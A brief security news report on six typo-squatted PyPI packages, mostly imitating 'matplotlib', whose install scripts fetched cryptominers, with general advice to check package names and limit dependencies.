Multiple PyPI packages installing cryptominers were caught this week by security researcher Ax Sharma. Six different packages, most of them impersonating the popular “matplotlib” Python package used to create graphs and visualizations, all used similar spellings or wording in an attempt to dupe unsuspecting victims into using the malicious package instead. In a blog post, Sharma found that the malicious setup.py files in the package installations were downloading a Bash script from a GitHub repository during the package installation. These scripts were downloading a cryptominer known as “Ubqminer” which mined for the Ubiq cryptocurrency. Another version of the malicious package installer opted for open-source T-Rex which allowed the attacker to use the victim’s GPU instead of the CPU when mining.
Typo-squatting on popular names in large open-source Python, NPM and other popular scripting language package repositories is not uncommon. Be sure to double check package names before installing them and do some investigating to see if the package is really what it claims to be. While many projects will need some sort of dependency, developers should also think about which packages are really needed before installing them.